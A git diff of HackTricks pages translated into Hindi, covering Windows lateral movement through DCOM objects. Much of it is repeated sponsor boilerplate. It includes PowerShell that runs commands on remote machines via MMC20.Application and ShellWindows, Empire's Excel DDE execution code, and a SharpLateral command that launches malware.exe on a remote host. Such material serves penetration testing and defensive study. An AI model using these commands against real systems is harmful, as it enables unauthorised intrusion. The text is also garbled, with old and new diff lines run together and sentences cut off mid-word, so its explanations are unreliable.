<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -2,17 +2,17 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [telegram समूह](https://t.me/peass) में शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details> </details>
बाहरी सिस्टम में कमांड्स को निष्पादित करने के लिए विभिन्न तरीके हैं, यहां आपको प्रमुख Windows लैटरल मूवमेंट तकनीकों के काम करने की व्याख्यान मिलेगा: बाहरी सिस्टम में कमांड्स को निष्पादित करने के विभिन्न तरीके हैं, यहाँ आपको मुख्य Windows लैटरल मूवमेंट तकनीकों काम करने की व्याख्याएँ मिलेंगी:
* [**PsExec**](../ntlm/psexec-and-winexec.md) * [**PsExec**](../ntlm/psexec-and-winexec.md)
* [**SmbExec**](../ntlm/smbexec.md) * [**SmbExec**](../ntlm/smbexec.md)
@ -20,18 +20,18 @@
* [**AtExec / SchtasksExec**](../ntlm/atexec.md) * [**AtExec / SchtasksExec**](../ntlm/atexec.md)
* [**WinRM**](../ntlm/winrm.md) * [**WinRM**](../ntlm/winrm.md)
* [**DCOM Exec**](dcom-exec.md) * [**DCOM Exec**](dcom-exec.md)
* ****[**कुकी पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) **** (बादल) * ****[**कुकी पा करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) **** (cloud)
* ****[**PRT पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) **** (बादल) * ****[**PRT पा करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) **** (cloud)
* [**AzureAD प्रमाणपत्र पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (बादल) * [**AzureAD सर्टिफिकेट पास करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [telegram समूह](https://t.me/peass) में शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details> </details>

View file

@ -5,16 +5,16 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा गड़बड़ी खोजें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। वे सुरक्षा गड़बड़ी खोजें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,7 +22,7 @@
## MMC20.Application ## MMC20.Application
वितरित कॉम्पोनेंट ऑब्जेक्ट मॉडल (DCOM) ऑब्जेक्ट्स नेटवर्क-आधारित ऑब्जेक्ट्स के साथ दिलचस्प क्षमता प्रस्तुत करते हैं। माइक्रोसॉफ्ट DCOM और कॉम्पोनेंट ऑब्जेक्ट मॉडल (COM) के लिए व्यापक दस्तावेज़ीकरण प्रदान करता है, जिसका उपयोग [DCOM के लिए यहाँ](https://msdn.microsoft.com/en-us/library/cc226801.aspx) और [COM के लिए यहाँ](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx) किया जा सकता है। DCOM एप्लिकेशनों की सूची PowerShell कमांड का उपयोग करके प्राप्त की जा सकती है: वितरित कपोनेंट ऑब्जेक्ट मॉडल (DCOM) ऑब्ज
```bash ```bash
Get-CimInstance Win32_DCOMApplication Get-CimInstance Win32_DCOMApplication
``` ```
@ -46,13 +46,11 @@ $com | Get-Member
ls \\10.10.10.10\c$\Users ls \\10.10.10.10\c$\Users
``` ```
अधिक जानकारी के लिए [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) देखें अधिक जानकारी के लिए [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) देखें
## ShellWindows & ShellBrowserWindow ## ShellWindows & ShellBrowserWindow
**MMC20.Application** ऑब्जेक्ट का पता लगाया गया कि यह "LaunchPermissions" को स्पष्ट रूप से अभाविप्त करता है, जो प्रशासकों को पहुंचने की अनुमति देता है। अधिक विवरणों के लिए, एक थ्रेड [यहाँ](https://twitter.com/tiraniddo/status/817532039771525120) जांचा जा सकता है, और [@tiraniddo](https://twitter.com/tiraniddo) के OleView .NET का उपयोग किया जाता है। **MMC20.Application** ऑब्जेक्ट का पता लगाया गया कि इसमें व्याख्यात "LaunchPermissions" की कमी है, जो प्रशासकों को पहुंचने की अनुमति देती है। अधिक विवरणों के लिए, एक थ्रेड [यहाँ](https://twitter.com/tiraniddo/status/817532039771525120) जांचा जा सकता है, और [@tiraniddo](https://twitter.com/tiraniddo) के OleView .NET का उपयोग विशेष रूप से विन्यासित अनुमतियों के बिना ऑब्ज
दो विशेष ऑब्ज
```powershell ```powershell
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>") $com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com) $obj = [System.Activator]::CreateInstance($com)
@ -61,9 +59,9 @@ $item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\sy
``` ```
### Excel DCOM ऑब्जेक्ट के साथ लैटरल मूवमेंट ### Excel DCOM ऑब्जेक्ट के साथ लैटरल मूवमेंट
लैटरल मूवमेंट को DCOM Excel ऑब्जेक्ट का शोषण करके प्राप्त किया जा सकता है। विस्तृत जानकारी के लिए, सुझाव दिया जाता है कि [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) पर DCOM के माध्यम से लैटरल मूवमेंट के लिए Excel DDE का उपयोग करने पर चर्चा की जाए लैटरल मूवमेंट को DCOM Excel ऑब्जेक्ट का शोषण करके प्राप्त किया जा सकता है। विस्तृत जानकारी के लिए, सुझाव दिया जाता है कि [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) पर DCOM के माध्यम से Excel DDE का उपयोग करने पर चर्चा पढ़ें
Empire परियोजना एक PowerShell स्क्रिप्ट प्रदान करती है, जो Excel का उपयोग द्वारा दूरस्थ कोड निष्पादन (RCE) का प्रदर्शन करता है जिसे DCOM ऑब्जेक्ट को मानिपुलेट करके किया जाता है। नीचे [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) पर उपलब्ध स्क्रिप्ट से अलग-अलग विधियों का प्रदर्शन करते हुए Excel का दुरुपयोग करने के लिए RCE के लिए: Empire परियोजना एक PowerShell स्क्रिप्ट प्रदान करती है, जो Excel का उपयोग द्वारा दूरस्थ कोड क्रियान्वयन (RCE) का प्रदर्शन करता है, DCOM ऑब्जेक्ट को मानिपुरित करके। नीचे [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) पर उपलब्ध स्क्रिप्ट से अलग-अलग विधियों का प्रदर्शन करने वाले अंश हैं:
```powershell ```powershell
# Detection of Office version # Detection of Office version
elseif ($Method -Match "DetectOffice") { elseif ($Method -Match "DetectOffice") {
@ -90,16 +88,16 @@ $Obj.DDEInitiate("cmd", "/c $Command")
इन तकनीकों को स्वचालित करने के लिए दो उपकरणों को उजागर किया गया है: इन तकनीकों को स्वचालित करने के लिए दो उपकरणों को उजागर किया गया है:
- **Invoke-DCOM.ps1**: एक PowerShell स्क्रिप्ट जो विभिन्न विधियों को आसानी से अभिवादन करने के लिए उपयुक्त है जिससे दूरस्थ मशीनों पर कोड का निष्पादन किया जा सकता है। यह स्क्रिप्ट Empire GitHub भंडार में उपलब्ध है। - **Invoke-DCOM.ps1**: एक PowerShell स्क्रिप्ट जो विभिन्न विधियों को आसानी से अभिवादन करने के लिए उपयुक्त है जो दूरस्थ मशीनों पर कोड का अभिवादन करने के लिए। यह स्क्रिप्ट Empire GitHub भंडार में उपलब्ध है।
- **SharpLateral**: एक उपकरण जो दूरस्थ स्थान पर कोड का निष्पादन करने के लिए डिज़ाइन किया गया है, जिसे निम्नलिखित कमांड के साथ उपयोग किया जा सकता है: - **SharpLateral**: एक उपकरण जो दूरस्थ स्थान पर कोड का अभिवादन करने के लिए डिज़ाइन किया गया है, जिसे निम्नलिखित कमांड के साथ उपयोग किया जा सकता है:
```bash ```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
``` ```
## स्वचालित उपकरण ## स्वचालित उपकरण
* Powershell स्क्रिप्ट [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) को आसानी से अन्य मशीनों में कोड निष्पादित करने के सभी टिप्पणीत तरीकों को आमंत्रित करने की अनुमति देता है। * Powershell स्क्रिप्ट [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) का उपयोग अन्य मशीनों में कोड निष्पादित करने के सभी टिप्पणीत तरीकों को आसानी से आमंत्रित करने की अनुमति देता है।
* आप [**SharpLateral**](https://github.com/mertdas/SharpLateral) भी उपयोग कर सकते हैं: * आप [**SharpLateral**](https://github.com/mertdas/SharpLateral) का भी उपयोग कर सकते हैं:
```bash ```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
``` ```
@ -110,7 +108,7 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा दोषों को खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसका प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। वे सुरक्षा दोष खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणात्मक खतरा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में आज़माएं**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -120,10 +118,10 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएँ देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का पालन करें।**
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबमिट करके। * **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>

View file

@ -4,33 +4,33 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
